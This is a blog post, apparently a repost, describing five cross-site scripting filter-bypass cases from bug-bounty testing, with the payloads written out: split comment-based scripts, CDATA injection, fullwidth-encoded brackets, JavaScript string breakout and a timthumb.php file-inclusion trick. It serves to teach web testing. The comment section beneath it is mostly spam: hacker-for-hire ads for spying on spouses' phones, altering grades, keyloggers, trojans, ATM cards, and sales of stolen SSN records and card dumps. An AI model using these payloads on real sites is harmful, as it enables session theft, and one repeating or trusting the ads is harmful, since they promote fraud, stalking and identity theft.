Bypassing XSS Filters



salam u alikum
--------------
I found this Explanation in some blog
--------------
Since the time bug bounties have started, a lot of security
vulnerabilities can be seen reported. From the college students to Hard
Core Security Researchers, all researchers have been into it. Cross-site
scripting or XSS is one such type of security flaw which is very
frequently reported as this can be found much more easily than other
flaws. But wait, are you sure this can be found easily always? Well, we
disagree.
Most testers use two payloads, i.e., “><img src=aa
onerror=alert(1);> and <script>alert(1)</script>; and try
them out at most of the injection points. If you are also following the
same approach, then you are likely to find XSS in most of conditions,
but not in ALL of them. What about those which do not lie in this
category (say the application has got a filter, or say they encode some
characters).

So instead of just passing random payloads, it’s pretty obvious to
first understand where and how the payloads are getting reflected (if
any). It simply means, if you can understand the request and response
properly, you can be the champion. So we will be talking about the
“approach for bypassing XSS filters” in this article.

Here we will mention some of the unique XSS vulnerabilities we found recently.
Case 1:
This is one which I loved personally. While testing an
application there were five columns on the EDIT profile page and all
were vulnerable to improper sanitization. All the payloads were getting
reflected in Attribute of input tag, however the only problem with all
of them was they were not allowing more than 14 characters in each
field. As I started with the following:

aa”>aaaa
[Image: a1.png]
[Image: a2.png]
Successfully injected and complete the input tag and displayed “aaaa” on the page. So I injected:
a”><script>alert(1)</script>
[Image: a3.png]

Injected successfully but didn’t executed my script due to length
based filtration and page was tampered. Tried several other payloads,
and then got to know that only 14 characters were allowed. Suddenly
thought of comments and along with partial payloads. So I broke my
payload into three parts and then injected in three columns
simultaneously:

Part1: “><script>/*
[Image: a4.png]
Part 2: */alert(1);/*
[Image: a5.png]
Part 3: */</script><!—
[Image: a6.png]
So once injected in HTML page, it was something like
<input value=””>script>/* BLAH BLAH BLAH */alert(1);/* BLAH BLAH BLAH */</script><!—
[Image: a7.png]
Where BLAH BLAH BLAH are the page contents which I commented using
the Multiline javascript comments and thus my XSS payload got executed
successfully.

Case 2:
While testing a FILE upload functionality, I intercepted the request
using burp. While the contents of file were being transferred as an XML,
the inputs were getting echoed on the page which was used to show the
progress of the upload. So I tried to include a CDATA into the XML file
and thought of including my XSS payload in between the CDATA. This
worked fine and I got an XSS. The response where XSS was being echoed
was something like below.

The payload used in this scenario was :
Quote:<![CDATA["><script>alert("XSS")</script><!--]]>
Complete Payload:
Quote:<Application><PNR>B2GBR</PNR><Count>1</Count><StaffTicket>
Quote:<![CDATA["><script>alert("XSS")</script><!--]]>
Quote:</StaffTicket><Itinerary><Flights><FlightNo>8981KL</FlightNo><From><Date>11/20/2012</Date><Time>04:30</Time>
Case 3:
While testing a .NET (.aspx) application which was sanitizing almost
all the inputs (both falling in attributes as well as in main HTML).
There was a module to modify the USER Details. At first I tried with the
following string as the first name value:

aaa<script>aaaa
Page redirected to Error Page, thought <script> might be blocked. So passed this:
aaa<h1>bbbbbb</h1>ccccccccc
Page redirected to Error Page, thought “tags” might be blocked. And
as this string was not passing in any attribute so only way to inject
HTML or JS required a TAG. So I tried with full width encoding. Here is a
complete chart which you can refer for the same. http://www.unicode.org/charts/PDF/UFF00.pdf . Using
this I encoded the right angular bracket (>) and left angular
bracket (<) to %uff1e and %uff1c respectively. Resulting payload with
XSS script:

%uff1cscript%uff1ealert(1)%uff1c/script%uff1e 
(<script>alert(1)</script>)
This time payload got injected but did not got executed. When I
analyzed the source code, got to see that due to length based filtering
some part of payload was not injected which was in fact defacing the
site. So I made another account. This time I thought to encode half of
the payload instead of encoding the complete payload. So I encoded
(<) to %uff1c but left (>) as it is. This reduced the length of my
payload by 22 characters. Therefore I passed:

%uff1cscript>alert(1)%uff1c/script>
And voila, this worked and I was able to report an XSS.
Case 4:
The inputs I was sending were getting reflected at around 5 places in
the response page. Two of them were in main HTML, where “angular
brackets” were filtered. Two of them were falling in input tag
attributes, where “double quotes” were filtered. However, one of them
was getting into JavaScript, which seemed to be a potential injection
point to me. The only mistake developers had done was, they forgot to
use “add-slash” with the single quotes and double quotes being passed in
JavaScript. As JavaScript if a HOTSPOT for XSS, I started my hit and
trial with it.

The place where my values were injecting was:
var a=(“bbbbb”, “abcdef”);’ — where bbbb was my injection point.
Obviously, there was no point of injecting “><img src stuff. So
at the very first I tried to take the things out of the variable, then
function and then execute.

aaa”aaa, “abcdef”);’ alert(1);
This got blocked as “SPACES” were not allowed in the input. So I used “plus sign”. And the page got redirected to an error page.
aaa”aaa,+”abcdef”);’+alert(1);
This didn’t work as “comma” was not allowed. Next:
aaa”aaa);’+alert(1); 
It still didn’t work. I wondered why it was not working. Then deeply
analyzed the code, and realized, I was supposed to close the string, so I
entered this:

aaa”aaa);’+alert(1); var c=”
Again there was something wrong; string was not getting closed
properly. At this point, I was able to inject the payload easily but was
unable to execute it properly. So next:

aaa”aaa);’+alert(1);+var size=’(“444
And finally a pop up. This payload actually, closed the string, took
my value out of the function, executed the alert(1), made another
variable in the same manner as previous one was made (in which values
were getting injected), and then left the double quote opened so as to
complete the actual string in the page.

So the main point which I wanted to explain from this article is,
don’t just “BRUTE FORCE” the payloads, instead try to analyze the
injection point and then make the payload.

Case 5:
This one I found on one of the BUG BOUNTY sites and was also out of
my favourite ones. While exploring the site, I got to see a Word-press
based blog being employed which moreover was using a theme which used an
older version of “timthumb.php” and to the surprise this was not
properly patched. Developers have patched the XSS in the file but
partially.

When I tried
http://example.com/wp-content/themes/yamidoo_pro/scripts/temp/timthumb.php?src=aaaa<bb>aa
The page echoed only aaaa aa and <bb> was sanitized in an
awesome manner. Then I tried RFI and tried to include a PHP file on the
server (by first uploading to a free web host), but the page came up
with an error that PHP files are not allowed. Again proper validation.
Everything was fine until I tried with a JS file.

When I uploaded JS file on my free web hosting account and then included it in timthumb with the following URL:
http://example.com/wp-content/themes/yamidoo_pro/scripts/temp/timthumb.php?src=abcdef.my3gb.com/flicker.com/shubham.js
the page said:
File type not supported: data/www/wp_blog/wp-content/themes/yamidoo_pro/scripts
Where abcd/xyz/pqr was the internal path disclosure and the MD5 was the hash of the (abcdef.my3gb.com/flicker.com/shubham.js)
Being very obvious, I modified the URL to http://example.com/wp-content/themes/yamidoo_pro/scripts/temp/17ba317694138461350bacd42cb37908.js
And BOOM. My js file was here. But as we know PHP files were not
supported, I tried with .cgi and .inc, both went waste as the file
started getting downloaded instead of executing there.

So I lowered down my mind from RFI to XSS and uploaded a HTML page on my free hosting account with malicious javascript into it.
Ex:
[Image: a8.png]
And named the file shubham.html
When I included the file to the example.com using the following URL:
http://example.com/wp-content/themes/yamidoo_pro/scripts/temp/timthumb.php?src=abcdef.my3gb.com/flicker.com/shubham.html
Again the error came
Unable to Open Image:
data/www/wp_blog/wp-content/themes/yamidoo_pro/scripts/./temp/b6an522ad9c735307e8f4ae822cc9d7c2.html
[Image: a9.png]
So modified the URL to
http://example.com/wp-content/themes/yamidoo_pro/scripts/temp/b6an522ad9c735307e8f4ae822cc9d7c2.htm6C
And as this was a page with malicious script, I got three Message
boxes and confirmed the XSS on the site. As this was a stored XSS, and
complete page can be made with whatever malicious script, this was
patched within a day by the site to which I reported.

[Image: a10.png]
[Image: a11.png]
Enjoy..!

About The Author

Salman Rafiq
Salman Rafiq is the Founder of 'My Basic Tricks'. I am a Security Researcher and Ethical Hacker, with experience in various aspects of Information Security and Other then I am SEO expert and a Blogger. My all efforts is to make internet more Security..

20 comments:

  1. Hello everyone, I have tried blackhatservers@gmail.com and i have confirmed her good work among all of this hackers out there ,she helped me hack my cheating partner whatsapp, facebook and cell phone number. I listened to all his calls and I was able to get good evidence for my attorney for divorce. It was really a big surprise to me but glad I gave a try. Contact her for similar issues on blackhatservers@gmail.com and
    consider your big problem solved

    ReplyDelete
    Replies
    1. ........ About us .......
      ..ShaunWells000@gmail.com
      ..Skype:ShaunWells000
      . . Hello Dears
      . . I am reseller of Hacking services
      . . Ethical Hacking tools & services
      -----------------------------------
      . . credit card
      . . debit card
      . . Shopping gift card
      . . bank transfer
      . . western union Transfer
      . . paid your bills
      . . Email Accounts
      . . PayPal Accounts
      . . i cloud Accounts
      . . CEO OR CFO Leads
      ........ Spamming tools .......
      . . cpnal 7$
      . . web mailer 6$
      . . mailer 5$
      . . random scam page 30$
      . . smtp 25$
      . . shell 5$
      ........ Carding tools .......
      . . admin rdp 30$ any county
      . . random rdp 8$ any county
      . . Ssh roots 40$
      . . vpn 35$
      . . sock 30$
      ........ Spy virus .......
      . . keylogger 120$
      . . Zeus Trojan 200$
      . . rat virus 130$
      ........ About us .......
      ..ShaunWells000@gmail.com
      ..Skype:ShaunWells000
      contact us
      https://hacktools.blogin.co/single-post.php?id=85323

      Delete
    2. Bitcoin is the future world currency and businesses, due to this many has fall a victim to scammer’s while some can't even access there bitcoin Wallet due to one reason or the other. Good news contact M&D group of hackers Team For Quality jobs Delivery, University Grades. Loans. Wiping Criminal Records. iClouds Breaching and Phones Hacking!!! We have help Individuals Organization to Secure and to Recover there lost Files/Password/ Bitcoin and funds etc. We Are Hacker 4Hire Email:- pointekhack@gmail.com‬ ‪hyperhackerone@gmail.com
      cyberhackertap@gmail.com

      HOW WE WORK? First Your complaint will be attend immediately and if busy we link you to a Guru experts base on the field job you reported and a procedure will be implemented according to the way you want it.

      Delete
    3. Bitcoin is the future world currency and businesses, due to this many has fall a victim to scammer’s while some can't even access there bitcoin Wallet due to one reason or the other. Good news contact M&D group of hackers Team For Quality jobs Delivery, University Grades. Loans. Wiping Criminal Records. iClouds Breaching and Phones Hacking!!! We have help Individuals Organization to Secure and to Recover there lost Files/Password/ Bitcoin and funds etc. We Are Hacker 4Hire Email:- pointekhack@gmail.com‬ ‪hyperhackerone@gmail.com
      cyberhackertap@gmail.com

      HOW WE WORK? First Your complaint will be attend immediately and if busy we link you to a Guru experts base on the field job you reported and a procedure will be implemented according to the way you want it.

      Delete
  2. I dont really know much about hacking after so many tries i met Cyberhacking lord who later help me find out my husband has been cheating on me and stealing from my bank account, he had this scheme going for 6 months. He gave me access to his mail,social media account,phone(could see deleted messages) and even track his location, still going to sue to him. Having doubts in your relationship? contact him (cyberhackinglord@gmail.com)

    ReplyDelete
    Replies
    1. Bitcoin is the future world currency and businesses, due to this many has fall a victim to scammer’s while some can't even access there bitcoin Wallet due to one reason or the other. Good news contact M&D group of hackers Team For Quality jobs Delivery, University Grades. Loans. Wiping Criminal Records. iClouds Breaching and Phones Hacking!!! We have help Individuals Organization to Secure and to Recover there lost Files/Password/ Bitcoin and funds etc. We Are Hacker 4Hire Email:- pointekhack@gmail.com‬ ‪hyperhackerone@gmail.com
      cyberhackertap@gmail.com

      HOW WE WORK? First Your complaint will be attend immediately and if busy we link you to a Guru experts base on the field job you reported and a procedure will be implemented according to the way you want it.

      Delete
  3. i met a guy called Sam ,he helped me hack into my spouse INSTAGRAM,KIK,FACEBOOK AND GMAIL. Now i can monitor my spouse day to day messages and activities with out him knowing .he is very kind and is services are not FREE and Expensive . He Specializes in all of the following:

    hack into email accounts and trace email location
    all social media accounts,
    school database to clear or change grades,
    Retrieval of lost file/documents
    DUIs
    company records and systems,
    Bank accounts,Paypal accounts
    Credit cards hack
    Credit score hack
    Monitor any phone and email address
    hack IP address
    Tap into anybody's call and monitor their conversation
    contact him at : cyberphoneways@gmail.com.
    Number:+16066579237.
    INSTAGRAME: Samhoffman3..
    ...you can try him out?

    ReplyDelete
  4. My husband was so smooth at hiding her infidelity and I had no proof for months, I saw a recommendation about a Private investigator and decided to give him a try.. the result was incredible because all my cheating husbands text messages, whatsapp, facebook and his phone conversations was sent directly to my Personal computer. Mr James helped me put a round-the-clock monitoring on him and I got concrete evidence and gave it to my lawyer..I say no to infidelity if your husband is an expert at hiding his cheating adventures contact him through Gmail he will help you(Worldcyberhackers) or WhatsApp : +12678773020

    ReplyDelete
  5. hello everyone. I want to recommend (gadgethacksolutions) on instagram or WhatsApp : +12678773020 for helping me getting access to my girlfriends mobile phone. He was reliable and trustworthy. you can contact him if you need help. He will surely help you. I am grateful I met him

    ReplyDelete
  6. My husband and i got Married last 3 year and we have been living happily for a while. We used to be free with everything and never kept any secret from each other until recently everything changed when he got a new Job in NewYork 2 months ago.He has been avoiding my calls and told me he is working,i got suspicious when i saw a comment of a woman on his Facebook Picture and the way he replied her. I asked my husband about it and he told me that she is co-worker in his organization,We had a big argument and he has not been picking my calls,this went on for long until one day i decided to notify my friend about this and that was how she introduced me to Mr James a Private Investigator  who helped her when she was having issues with her Husband. I never believed he could do it but until i gave him my husbands Mobile phone number. He proved to me by hacking into my husbands phone. where i found so many evidence and  proof in his Text messages, Emails and pictures that my husband has an affairs with another woman.i have sent all the evidence to our lawyer.I just want to thank Mr James for helping me because i have all the evidence and proof to my lawyer,I Feel so sad about infidelity. i contacted him on gmail (worldcyberhackers)

    ReplyDelete
  7. Recovery Abet Is An Experienced Private Hacking & Recovery Organization with it’s uniquity in handling tasks on a top notch level. We help you recover your lost Bitcoin (BTC), ETH and TBC. Service takes within 48 hours. Contact email address - ALEXGHACKLORD@GAMiL .com. Hacking Services that you will find here at: ALEXGHACKLORD@GMAIL .com are custom to fit your requirements. A professional and experienced hacking team providing hacking services for a variety of client’s needs. Specialize in different hacking services some of which are ;

    * Stolen funds recovery from any Binary platform which takes just within 24 hours.

    * Change School Grade

    * I render LOANS of any amount only with capable customers

    * Bank jobs

    * Stolen or Lost BTC, TBC and ETH recovery

    * Database hack

    * Remove Criminal Records

    * Facebook hack

    * Gmail hack

    * Whatsapp hack

    * Website hack

    * Tracking calls

    * Phone clone

    * Online records changes

    * Retrieval of hacked social media accounts

    * University grades

    * Android and iphone hack

    * Twitter hack

    * Any website hack

    If you are looking for a team of professional hackers that specializes in genuine hacking services.
    Contact email - ALEXGHACKLORD@GMAIL. COM

    WE CAN HELP YOU TRACE THE ACTUAL LOCATION OF THE PERSON AND DO WHATEVER YOU REQUEST TO THE PERSON’S COMPUTER.
    IS ANYONE BLACKMAILING YOU ONLINE? AND YOU WANT ME TO GET INTO THEIR COMPUTER AND DESTROY DATA AND EVIDENCES AGAINST YOU?
    A service you wish was listed but isn’t? contact us:::::::ALEXGHACKLORD@GMAIL. COM

    ReplyDelete
  8. A highly recommended private investigator/computer expert on here ,you must have heard or seen a user on here recommend him before. He's got great hacking skills... you should hit him up me for all Infidelities issues,insecurity and spying related....he is spynetprofessionalhackers He has a lot to offer on his database easily reach him on SPYNETPROFESSIONALHACKERS@GMAIL.COM and know where you stand in your relationship I can always vouch for him.

    ReplyDelete

  9. Hello here, i’ll like to share my experience with (Alexghacklord@gmail.com i had serious issues after i got back from Asia on a business trip, my friends at home were looking worried for me like my wife had been doing some stuff while i was away and they felt like we was done, of course i didnt believe everything they said and i’m not the type to confront anybody so i didnt, i read about (Alexghacklord ) online and i contacted him, before i travelled back for work i found out alot and it really hurt me, she still doesnt know i can read her whatsapp conversation and text messages and once i confront her and she tells a lie, i will have more than enough evidence.
    Email: Alexghacklord@gmail!com

    ReplyDelete
  10. I never thought I will come in contact with a real and potential hacker until I knew   brillianthackers800 at Gmail and he delivered a professional job,he is intelligent and understanding to control jobs that comes his way
    You can message on his number (385) 2501115,
    Contact him and be happy

    ReplyDelete
  11. Häkker aitas mul oma naise WhatsAppi, meilisõnumeid ja kõiki tema iPhone'ile saadetud tekstsõnumeid ning viimase kuue kuu kustutatud sõnumeid luurata. Saate talle saata selle numbri kaudu telefoninumbri (+13852501115) või võtta temaga ühendust e-posti aadressil brillianthackers800 @. gmail.com

    ReplyDelete
  12. I was so anxiuos to know what my husband was always doing late outside the house so i started contacting hackers and was scamed severly until i almost gave up then i contacted this one hacker and he delivered a good job showing evidences i needed from the apps on his phone like whatsapp,facebook,instagram and others and i went ahead to file my divorce papers with the evidences i got,He also went ahead to get me back some of my lost money i sent to those other fake hackers,every dollar i spent on these jobs was worth it.Contact him so he also help you.
    mail: premiumhackservices@gmail.com
    text or call +1 4016006790

    ReplyDelete
  13. TESTIMONY ON HOW I GOT MY LOAN FROM A GENUINE FINANCE COMPANY LAST WEEK. Email for immediate response: drbenjaminfinance@gmail.com

    I am Mrs,Leores J Miguel by name, I live in United State Of America, who have been a scam victim to so many fake lenders online between November last year till July this year but i thank my creator so much that he has finally smiled on me by directing me to this new lender who put a smile on my face this year 2020 and he did not scam me and also by not deceiving or lying to me and my friends but however this lending firm is BENJAMIN LOAN INVESTMENTS FINANCE (drbenjaminfinance@gmail.com) gave me 2% loan which amount is $900,000.00 united states dollars after my agreement to their company terms and conditions and one significant thing i love about this loan company is that they are fast and unique. {Dr.Benjamin Scarlet Owen} can also help you with a legit loan offer. He Has also helped some other colleagues of mine. If you need a genuine loan without cost/stress he his the right loan lender to wipe away your financial problems and crisis today. BENJAMIN LOAN INVESTMENTS FINANCE holds all of the information about how to obtain money quickly and painlessly via Call/Text: +1(415)630-7138 Email: drbenjaminfinance@gmail.com

    When it comes to financial crisis and loan then BENJAMIN LOAN INVESTMENTS FINANCE is the place to go please just tell him I Mrs. Leores Miguel direct you Good Luck....

    ReplyDelete
  14. Cool way to have financial freedom!!! Are you tired of living a poor life, here is the opportunity you have been waiting for. Get the new ATM BLANK CARD that can hack any ATM MACHINE and withdraw money from any account. You do not require anybody’s account number before you can use it. Although you and I knows that its illegal,there is no risk using it. It has SPECIAL FEATURES, that makes the machine unable to detect this very card,and its transaction can’t be traced .You can use it anywhere in the world. With this card,you can withdraw nothing less than $4,500 a day. So to get the card,reach the hackers via email address : besthackersworld58@gmail.com or whatsapp him on +1(323)-723-2568

    ReplyDelete
  15. ****Contact Me****
    *ICQ :748957107
    *Gmail :taimoorh944@gmail.com
    *Telegram :@James307


    (Selling SSN Fullz/Pros)

    *High quality and connectivity
    *If you have any trust issue before any deal you may get few to test
    *Every leads are well checked and available 24 hours
    *Fully cooperate with clients
    *Any invalid info found will be replaced
    *Credit score above 700 every fullz
    *Payment Method
    (BTC&Paypal)

    *Fullz available according to demand too i.e (format,specific state,specific zip code & specifc name etc..)

    *Format of Fullz/leads/profiles
    °First & last Name
    °SSN
    °DOB
    °(DRIVING LICENSE NUMBER)
    °ADDRESS
    (ZIP CODE,STATE,CITY)
    °PHONE NUMBER
    °EMAIL ADDRESS
    °Relative Details
    °Employment status
    °Previous Address
    °Income Details
    °Husband/Wife info
    °Mortgage Info


    $2 for each fullz/lead with DL num
    $1 for each SSN+DOB
    $5 for each with Premium info
    (Price can be negotiable if order in bulk)


    OTHER SERVICES ProvIDING

    *(Dead Fullz)
    *(Email leads with Password)

    *(Dumps track 1 & 2 with pin and without pin)

    *Hacking Tutorials
    *Smtp Linux
    *Safe Sock

    *Let's come for a long term Business


    ****Contact Me****
    *ICQ :748957107
    *Gmail :taimoorh944@gmail.com
    *Telegram :@James307

    ReplyDelete

Copyright © 2013 My Basic Tricks and Salman Rafiq.